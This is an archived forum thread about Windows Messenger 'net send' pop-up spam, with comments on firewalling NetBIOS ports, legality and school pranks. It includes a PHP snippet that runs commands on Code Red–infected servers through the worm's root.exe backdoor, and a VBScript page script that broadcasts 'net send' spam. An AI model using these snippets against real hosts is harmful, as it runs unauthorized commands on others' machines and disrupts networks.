Windows/NetBIOS pop-up Spam:

bofus writes "This article from Wired News presents a new way to deliver unsolicited advertising content - the MS Windows Messenger service. It appears that the client software hasn't been widely distributed yet, but it's probably only a matter of time before a free clone is circulating. This method could become the delivery method of choice for all kinds of unsolicited junk, given the number of unsecured PCs out there. On the flip side, if you run a relatively secured machine and have some sort of firewall, this probably shouldn't concern you."

Wonderful...

[Dark-One]

I first saw this on my cable modem(before I started using IPTables to share my connection) Then I noticed it on my network on campus. And as I am the administrator I simply blocked the ports on our firewalls. However I can not imagine what students thought when they saw these messages. As a mater of course we disable NT messaging on our servers and all of our faculty/admin machines because its not needed. However I never tought I would need to block it from the internet. But apparently its become a big problem. I have heard from a number of students that they have received these messages, all in one day. I suppose that it just means I have to make our firewall all that more restrictive; which I hate to do.

Legality?

[DesScorp]

Couldn't law enforcement nail them for using this kind of method? Assuming the spammers in question could be found, of course? This isn't a case where you visit a website, and an affiliate's popup ad appears. The argument could be made that if you visit a site voluntarily, you can't hold them accountable for popups. And while mail spam is annoying, it's legal if certain procedures are followed (but that's another rant entirely). It seems to me that THIS method is so intrusive as to warrant prosecution. Unfortunately, even if I'm right, it's pissing in the wind to hope for any legal redress. If the internet ever dies, it won't be because of government tyranny or the RIAA. It'll die because people will become so fed up with the spam and porn shoveled at them, they'll just turn it off.

already out there

[htmlboy]

two weeks ago, we had a big hulabaloo here at uiuc.edu because of this. all the win2k/xp machines on all of campus still running the messenger service got a popup describing how great our lives would be if only we had a diploma from a non-accredited university. most of the "administrative" users assumed it was a virus and panicked. then three more of the same came in this morning.

i just wish windows would log things like the origin of said messages so the abuse could be addressed at its source.

This is old hat...

[Mysticalfruit]

If you've got a machine out on the internet and you've windows networking turned on, you've probably got bigger problems.

A couple years ago, a co-worker of mine were at his house when he turned on windows networking and set his domain to "WORKGROUP" did the obligatory reboot suffle and started surfing all the shares in the area. It was hilarious, people had their entire C:\ drives shared, etc. Needless to say, after we got him setup with a firewall (linux/maq box) sure enough the logs just rolled with people trying to connect to ports 137/138/139. In one regard may ISP's block the netbios ports on their ingress and egress gateways.

Slap em! :P

[Palos]

Saw this a while ago, looks like it could be fun:
Slap:If your like me you run firewall software that tells you when someone tries to access your system. Sometimes I respond with a few packets of my own just to let them know that I am paying attention. I wrote Slap to make responding to these access attempts easier and more entertaining. Just enter the IP address of the person you wish to slap and click on the Slap button. The program will attempt to access all the ports in the list and send them a packet with a personal message. (The default message is 'Leave Me Alone!') Slap integrates with Black Ice and Zone Alarm and can use information received from these software firewalls to "Auto Slap" intruders and add their attacks to your list of responses. --Here is a cool Wav file to use with this.

Why would anyone pay for this?

[daveman_1]

$700? You've got to be kidding me. I'm not going to waste the time, but it wouldn't be to difficult to make a perl script that increments an IP address range and calls smbclient -M... In fact, it would be really easy for someone to do this one time and send a link to the tone of "Tired of annoying messages like this? Go to www.xxx.net to find out how to eliminate messages like this forever." And that would be the end of this problem. Unfortunately, if you did this as a regular citizen, you'd have the FBI crashing through your window in no time for "hacking"...

Sad really.

Re:Instructions for Windows NT/2000/XP Users

[afidel]

not everyone needs it but it sure can be usefull. Our netapps have the ability to send a message before they are taken offline for maintenance (like we did recently when moving from a couple single filers to a f880 cluster). We also use it with our Samba server to notify the users when their print jobs have cleared the queue (great for plotters or very high traffic lasers).

better, just drop em -- Re:Slap em! :P

[zrodney]

that's cute, but often the ip you have is not the origin, but a hapless victim
which is being used to launch the attack and/or hide the tracks of the real blackhat

by sending data back to that ip, you may be unwittingly being used to help the intruder hide
and you may appear to be the intruder in the logs of the machine which the blackhat is using as a stepping stone

that's probably not what you are trying to do
and that's why I just add those ips to a droplist instead of sending data back

Re:what client ?!?1

NET SEND was suggested months ago in Code Red antidotes. Broadcasting to the attacker's entire domain through the worm's back door for notification.

<?php
$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5); fputs($fp,
"GET /scripts/root.exe?/c+net+send+%25USERDOMAIN%25+\"Y our+web+server+$REMOTE_ADDR+is+infected+with+Code+ Red+II.+See+www.incidents.org+for+instructions+on+ how+to+remove.\" HTTP/1.0\r\n\r\n");
fclose($fp);
?>

There is no file here. I assume you are a Code Red worm. You have been warned.
</html>

A few points

[yar]

Yes, this was talked about earlier. Some of the comments provided then were helpful, others less than so. There was a lot of FUD about how using any form of share or NetBIOS at all meant that you were "already hacked." If an administrator knows what they're doing, that's not true.

I work at a large university. The obvious solutions don't quite work for us. We'd like to be able to block 135-139. However, some of us are required to use Outlook. *pause* On an Exchange server. *pause* And, we've been told that some of the Outlook functionality depends on the Messenger service being available.

I block it. But not everyone (particularly some administrative staff and some professors) has the technical knowledge to do so, and some people actually use it.

Re:How to do it

[ep32g79]

I discovered the joy's of "net send" back in the eighth grade. I thought it was fun to be able to message my friends at school while they were loged on, admins had disabled the novel send client.

I soon began to use a batch file to repetedly spam them with messages, a little while later I build a Visual C++ program to allow a user to input the user they wished to spam along with their message and how many times to spam them. It was amazing to watch how fast the program I made spread through the junior high.

After about a week and a half I was called into the office and suspended for 3 days because roughly 56 people in my class used my program to harass their classmates.

We did this to a couple script kiddies

[naarok]

At the last place I worked, we had a number of IPs assigned. This made it painfully obvious in the logs when some script kiddie was port scanning us. On a couple occaisions we found that the machine scanning us had netsend active and availble, so we net sended them telling them to stop port scanning or we would take action. We could just picture the 13 year-old kid at the other end freakin out at this message popping up on their monitor.

Re:Least of your problems.

[nuxx]

Can't break into a box remotely as NetBEUI is non-routable. You can't even talk to the box. And if you properly set up NetBEUI (eg: removing the NetBIOS binding to TCP/IP), NetBIOS can't have a problem. I'm assuming for the third point you mean NetBEUI won't cooperate with TCP/IP for bandwidth. Nope, but I doubt that the speed you get off your cable modem will be impacted much by whatever is going around your local network with NetBEUI.

Let me tell you an idea I had....

[mark-t]

Presumably, the messenger service exists because it is perceived as useful. So simply stopping the service may not be seen as particularly constructive.

What about altering the service so that instead of just popping up a window that you can do nothing with but close, there would exist an additional button [REPLY] on the pop up message window, which would then allow you to respond to the alert message as you see fit? (Sending a message back to the source via the same net send facility that they used to send data to you).

Now I presume, of course, that an authorized administrator would have a large say in what services are going to be running on the computers in his domain, so if he wasn't interested in fielding replies to his authorized alert messages, he could simply have the requirement that the normal "one-way" messenger is the one that gets installed on the domain machines. Meanwhile, unauthorized sends would find themselves the target of maybe hundreds or thousands of replies, potentially causing a D.O.S. for them, even if they weren't actually running the messenger service themselves.

Of course, the new messenger service would also log the time, date, and originating IP of the sender, so that it can be confirmed later -- even if the sender does not happen to be running the messenger service himself.

Now I realize that this doesn't do a thing for handling people who fake their IP address, but I'd bet it go some distance to making this virtually unusable by most of the people who would just use such tools to spam.

TUSD insecurity

[nonweasel]

My school has recently had a big problem with this. Students used a lameass program called NetHail. I remember doing the same thing with smbclient, and a perl script though...

I just got spammed by one of these the other day..

[MontyP]

I come home one night to find one of these on my desktops... I thought it was funny and just happen to have taken a screen shot

Messenger_Service_Spam.gif

Misuse aside....

[AtariDatacenter]

I'm glad to see this feature. When I was managing a very large multiuser application, from time to time, I would have to close some sessions were causing problems. Or I would see a problem going on, and would like to know more about what they see on their end. But armed with only an IP address and a vauge hostname, I could only track them reliably as far as what building they were in. "If only I could hit their walld", I said.

BTW, at the same time, UNIX users are in for a treat if their syslogd can accept outside messages. (Default behavior on many OSs, but has been changing.)

Think "kernel.crit".

Hell, one person, hit the whole work group...

[woogieoogieboogie]

running 2k or XP

<script language="VBScript">
Dim WSHShell
Set WSHShell = CreateObject("WScript.Shell")
WSHShell.Run "command /k net send * Hi!!! Why Dont you Buy our Latest product today", 2, False
Set WSHShell = Nothing
WScript.Quit(0)
</script>

Imagine it in a perpetual loop, eveyone in the workgroup would get barraged with popups until the fool who clicked yes to the active x warning was found. Pretty annoying reason to have shut down a network.

Is this a new security flaw in Windows?